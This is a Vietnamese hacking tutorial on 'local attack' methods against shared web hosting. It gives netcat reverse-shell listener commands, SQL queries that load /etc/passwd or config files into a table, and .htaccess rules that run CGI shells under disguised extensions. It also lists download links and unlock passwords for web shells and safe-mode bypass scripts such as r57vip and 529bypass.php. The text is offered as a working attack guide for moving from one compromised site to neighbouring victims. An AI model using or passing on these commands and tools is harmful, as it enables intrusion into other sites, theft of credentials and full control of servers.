nc -lvvnp 3333

nc -nvv -l -p 12345

nc 127.0.0.1 7777

nc -vv -l -p 7777

nc -vlp 443

                +             -l:  đặt netcat vào chế độ lắng nghe để chề kết nối đến

                +             -n: Chỉ dùng ip ở dang số, ví dụ: 123.30.2.42, netcat sẽ ko xét đến DNS.

                +             -p: Chỉ định cổng cần lắng nghe hay kết nối

                +             -v: Hiện thi các thông tin về kết nối hiện tại.  –vv sẽ hiện thị thông tin chi tiết hơn nữa.

-          Lưu ý là cần coppy nc.exe vào 1 vị trí nào trong máy rồi sử dụng command đến thư mục chứa nc.exe trước khi thực hiện các câu lệnh liên quan đến netcat

-          Sauk hi đã backconnect thành công thì tiến hành local đơn giản chỉ bằng 1 câu lệnh coppy shell từ site đã up được shell tới site victim.

       8-      Via SQL

-          Login vào database và tạo 1 table để load các thông tin bằng cách sử dụng querry sau

create table soleil ( ducdung08clc varchar (1024));

-          Query load các thông tin  vào table table vừa được tạo:

load data local infile '/etc/passwd' into table soleil

Có thể thay câu lệnh “/etc/passwd” bằng path dẫn đến file config.

-          Query hiện thị các thông tin được load vào table soleil:

select * from soleil

-          Phương pháp này được gọi là Via SQL, chủ yếu sử dụng khi server không cho chạy run command và có thể bypass đối với 1 số server.

1         số lưu ý:      

-           Đối với 1 số server Safe_mod: ON,  thì shel không có chức năng run command để thực thi các câu lệnh, vậy làm sao có thể local được.  Giải pháp được nghĩ đến là sử dụng shell cgi:

+         Soleil.pin

http://www.mediafire.com/?4k94v1i0shmr46c

Cách sử dụng:

-          Up shell soleil.pin và chmod nó về 755

-          Up hoặc tạo file .htaccess trong thư mục chứa shell có nội dung:

## START ##

Options +ExecCGI

AddHandler cgi-script cgi pl cgi gmc pin jpg

RewriteEngine on

RewriteRule (.*)\.mil$ $1.cgi

Options +FollowSymLinks

DirectoryIndex cmd.html

Options +Indexes

RemoveHandler .hack

AddType text/plain .hack

## milw0rmvn exploit ##

Hoặc:

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .cin

AddHandler cgi-script .pin

AddHandler cgi-script .pin

+             telnet.pl

http://www.mediafire.com/?t9cavs1n0ipthq1

shell telnet.pl có chức năng hoàn toàn tương tự với con shell soleil.pin. Tuy nhiên cách thức sử dụng nó thì đơn giản hơn nhiều vì không phải sử dụng đến file .htaccess mà chỉ cần chmod nó về 755 là chạy được.

( Pass unlock: soleil_vhb, pass dải nén nếu có : ceh.vn )

-          *   Đối với các server không có chức năng run command và cũng không cho chạy shell cgi thì có thể sử dụng các shell sau để bypass đơn giản đối với 1 số server.

                +             facesymlink.php

http://www.mediafire.com/?fc9kencnilx0rm4 ( 5.2.12 -> 5.3.1

http://www.mediafire.com/?kmid8rahl5wjh74 ( version 5.3 -> 5.4 )

                +             529bypass.php

                http://www.mediafire.com/?cls0e5k873w83ef

                +             Bypassnull.php

http://www.mediafire.com/?1x0zxmig5ctwezr

 

                +             Hoặc sử dụng safe mode bypass

http://www.mediafire.com/download.php?38d13jgqw132db2

 

                +             Sử dụng các chức năng bypass trên con shell r57vip này ( nên convert domain sang dạng ip)

http://www.mediafire.com/?sqjs5du3srlifqt

               

                +             Hoặc sử dụng via sqli

v.v….

(Tất cả các shell download trên đều có pass unlock: vhb_soleil và pass dải nén nếu có: ceh.vn)

              Trong bài tut trên soleil đã giới các phương pháp local attack cơ bản và các dạng bypass cơ bản nhất có thể sử dụng. Trong bài tiếp theo soleil sẽ đề cập đến các dạng bypass nâng cao đối với 1 số server khó, các thủ thuật vượt chmod qua 400 permission, chiếm quyền điều khiển root (get root) và các kỹ thuật up shell đối với 1 số mã nguồn mở như: joomla, worpress, nukeviet, vbulletin, drupal...

Các Phương Pháp Local Attack

By: MIN Software on: 9:30 PM